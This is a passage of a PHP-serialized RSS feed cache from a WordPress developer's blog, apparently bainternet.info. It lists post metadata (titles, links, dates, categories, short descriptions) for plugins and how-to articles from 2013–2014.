Plugin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:49:"https://en.bainternet.info/category-order-plugin/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:58:"https://en.bainternet.info/category-order-plugin/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 25 Jun 2014 07:57:12 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:7:"Plugins";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:16:"WordPress Plugin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:33:"http://en.bainternet.info/?p=2082";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:708:"A simple and lightweight plugin to sort posts within a category using drag n` drop, which lets you order posts per category.\n<p><a href="https://en.bainternet.info/category-order-plugin/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/social-comments-plugin/" rel="bookmark" title="Social Comments plugin">Social Comments plugin </a></li>\n<li><a href="https://en.bainternet.info/author-category/" rel="bookmark" title="Author category">Author category </a></li>\n<li><a href="https://en.bainternet.info/custom-category-template/" rel="bookmark" title="Custom Category Template">Custom Category Template </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:54:"https://en.bainternet.info/category-order-plugin/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"8";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"2082";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:22:"Social Comments plugin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:50:"https://en.bainternet.info/social-comments-plugin/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:59:"https://en.bainternet.info/social-comments-plugin/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 15 May 2013 17:46:50 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:6:{i:0;a:5:{s:4:"data";s:7:"Plugins";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"custom plugin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:8:"facebook";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:11:"google plus";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:15:"social comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:33:"http://en.bainternet.info/?p=1112";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:824:"This plugin lets you use commenting systems from Facebook, Google plus, Disqus or native WordPress comments in any combination of the four you can think of.\n<p><a href="https://en.bainternet.info/social-comments-plugin/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/simple-google-1-plugin/" rel="bookmark" title="Simple Google +1 plugin">Simple Google +1 plugin </a></li>\n<li><a href="https://en.bainternet.info/user-specific-content-plugin/" rel="bookmark" title="User specific Content Plugin">User specific Content Plugin </a></li>\n<li><a href="https://en.bainternet.info/wordpress-simple-instant-search-plugin/" rel="bookmark" title="WordPress Simple Instant Search Plugin">WordPress Simple Instant Search Plugin </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:55:"https://en.bainternet.info/social-comments-plugin/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:3:"135";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"1112";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:48:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:25:"Custom Post Types columns";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:53:"https://en.bainternet.info/custom-post-types-columns/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:62:"https://en.bainternet.info/custom-post-types-columns/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 05 May 2013 13:02:59 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:5:{i:0;a:5:{s:4:"data";s:15:"Fancy Functions";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:6:"How To";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"custom fields";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:16:"custom post type";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:15:"custom taxonomy";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:33:"http://en.bainternet.info/?p=1090";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1011:"When creating custom post type (usually) i find myself having to write the same code over and over for adding or removing admin post listing columns and if you follow my stuff you know that its not my style 🙂 So i coded my self this helper class to simple add or remove admin admin [&#8230;]\n<p><a href="https://en.bainternet.info/custom-post-types-columns/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/add-taxonomy-filter-to-custom-post-type/" rel="bookmark" title="Add Taxonomy filter to Custom Post Type">Add Taxonomy filter to Custom Post Type </a></li>\n<li><a href="https://en.bainternet.info/custom-post-type-getting-404-on-permalinks/" rel="bookmark" title="Custom Post type getting 404 on Permalinks">Custom Post type getting 404 on Permalinks </a></li>\n<li><a href="https://en.bainternet.info/wordpress-run-once-only/" rel="bookmark" title="WordPress run once only">WordPress run once only </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:58:"https://en.bainternet.info/custom-post-types-columns/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"30";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"1090";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:21:"My GSOC 2013 proposal";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:49:"https://en.bainternet.info/my-gsoc-2013-proposal/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:57:"https://en.bainternet.info/my-gsoc-2013-proposal/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 02 May 2013 11:15:18 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:13:"Uncategorized";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"gsoc2013";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:33:"http://en.bainternet.info/?p=1071";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:863:"Background The Dashboard Widgets API idea fascinated me ever since Eric Mann suggested it on the Make Core blog which during that time I needed to create a dashboard widget for a private project and I found the current API to be more of a collection of functions then a proper API. I feel that [&#8230;]\n<p><a href="https://en.bainternet.info/my-gsoc-2013-proposal/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/simple-qr-code/" rel="bookmark" title="Simple QR Code">Simple QR Code </a></li>\n<li><a href="https://en.bainternet.info/wordpress-services/" rel="bookmark" title="WordPress Services">WordPress Services </a></li>\n<li><a href="https://en.bainternet.info/sidebar-per-user-role/" rel="bookmark" title="Sidebar per user role">Sidebar per user role </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:54:"https://en.bainternet.info/my-gsoc-2013-proposal/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"1071";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:48:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:15:"Simple LyteLoad";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:43:"https://en.bainternet.info/simple-lyteload/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:52:"https://en.bainternet.info/simple-lyteload/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 28 Apr 2013 07:44:50 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:5:{i:0;a:5:{s:4:"data";s:7:"Plugins";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:13:"custom plugin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:11:"development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:3:"plu";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:16:"WordPress Plugin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"http://en.bainternet.info/?p=986";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:914:"Contents Screenshots: What does it do? Features: Download: Usage: Change Log: Here is a new plugin which the main reason for creating was to take some old code of mine that i have been using in many sites and turn it in to a plugin created with Better Plugin Maker (which is another plugin which [&#8230;]\n<p><a href="https://en.bainternet.info/simple-lyteload/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/simple-gist-embed/" rel="bookmark" title="Simple Gist Embed">Simple Gist Embed </a></li>\n<li><a href="https://en.bainternet.info/simple-toc-table-of-contents-plugin/" rel="bookmark" title="Simple TOC &#8211; table of contents plugin">Simple TOC &#8211; table of contents plugin </a></li>\n<li><a href="https://en.bainternet.info/simple-qr-code/" rel="bookmark" title="Simple QR Code">Simple QR Code </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:48:"https://en.bainternet.info/simple-lyteload/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:3:"986";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:36:"\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:21:"Sidebar per user role";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:49:"https://en.bainternet.info/sidebar-per-user-role/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:58:"https://en.bainternet.info/sidebar-per-user-role/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 13 Mar 2013 16:31:30 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:7:"Plugins";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"http://en.bainternet.info/?p=936";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:955:"Contents Screenshots: What does it do? Features: Download: Usage: Change Log: It\'s been a while since I ported a class from my framework into a plugin (Custom Taxonomy Template , Custom Category Template) and last week a saw a question titled "display specific sidebar for each role?" so i figured since i already have the [&#8230;]\n<p><a href="https://en.bainternet.info/sidebar-per-user-role/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/user-specific-content-plugin/" rel="bookmark" title="User specific Content Plugin">User specific Content Plugin </a></li>\n<li><a href="https://en.bainternet.info/wordpress-user-ranking/" rel="bookmark" title="WordPress User Ranking">WordPress User Ranking </a></li>\n<li><a href="https://en.bainternet.info/custom-category-template/" rel="bookmark" title="Custom Category Template">Custom Category Template </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:54:"https://en.bainternet.info/sidebar-per-user-role/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:3:"936";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:42:"\n		\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:42:"WordPress Environments and version control";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:76:"https://en.bainternet.info/development-environments-wordcamp-jerusalem-2013/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:85:"https://en.bainternet.info/development-environments-wordcamp-jerusalem-2013/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 03 Mar 2013 08:48:37 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:3:{i:0;a:5:{s:4:"data";s:6:"How To";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:11:"development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:15:"version control";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"http://en.bainternet.info/?p=896";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1080:"Two weeks ago we had a WordCamp in Jerusalem Were i Spoke about Development Environments in WordPress ad As promised here is a short recap and the "Slides" What\'s this about Development Environments. Development Workflow. Tips and Tricks: Server Domain Files Database Some (little) Version Control. Basically i covered: a A workflow of 3 environments [&#8230;]\n<p><a href="https://en.bainternet.info/development-environments-wordcamp-jerusalem-2013/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/wordpress-easy-login-url-with-no-htaccess/" rel="bookmark" title="WordPress Easy Login URL with no htaccess">WordPress Easy Login URL with no htaccess </a></li>\n<li><a href="https://en.bainternet.info/wordpress-auto-installer-for-wamp/" rel="bookmark" title="WordPress auto installer for wamp">WordPress auto installer for wamp </a></li>\n<li><a href="https://en.bainternet.info/tax-meta-class-faq/" rel="bookmark" title="Tax Meta Class &#8211; FAQ">Tax Meta Class &#8211; FAQ </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad 